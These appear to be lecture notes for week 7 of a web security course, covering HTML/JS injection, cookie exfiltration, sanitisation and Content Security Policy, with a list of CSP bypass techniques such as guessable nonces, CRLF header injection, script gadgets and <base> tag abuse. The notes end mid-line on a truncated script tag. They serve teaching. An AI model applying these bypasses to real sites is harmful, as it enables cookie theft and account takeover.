week 7

• JS/HTML injection
• Exfiltrating cookies
• JS/HTML sanitisation
• Content Security Policy
• CSP bypasses
  • Guessable nonces.
  • Being able to upload to an allowlisted site, including 'self'.
  • Injecting \r\n\r\n into a response header so that some of the headers (potentially the CSP!) are pushed into the response body.
  • Vulnerabilities in either libraries used legitimately on the page, or in libraries permitted by the CSP (script gadgets).
  • Using <base> to change the base URI of the page to bypass 'self'.
  • Injecting markup to replace <meta> tag containing the CSP.
• SOP will be covered next week
• Report 1, midterm, Topic 4 intro challenges to be demoed (depending on timing)
  • bigapp, sign in,

`<scri